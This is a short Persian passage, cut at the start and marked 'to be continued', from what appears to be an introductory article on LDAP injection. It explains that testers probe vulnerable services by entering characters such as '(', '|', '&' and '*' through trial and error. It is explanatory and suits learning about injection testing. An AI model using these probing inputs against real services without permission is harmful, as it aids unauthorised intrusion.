مطابقت پیدا کند یا می توان گفت با هر مقداری برابری کند. اگر سرویس در مقابل تزریق LDAP آسیب پذیر باشد ، اجرای دستورات و همچنین اجازه اتصال توسط LDAP ، را در بررسی اولیه برای مهاجم مهیا می کند پس می توان نتیجه گرفت که در تحلیل و بررسی هایی اولیه با وارد کردن پارامترهای ‘(‘ ، ‘| '،‘ &' ، ‘* 'و سایر کارکترها در بررسی آزمون و خطا برای تست نفوذ پذیری می توان به آن رسید . ادامه دارد ....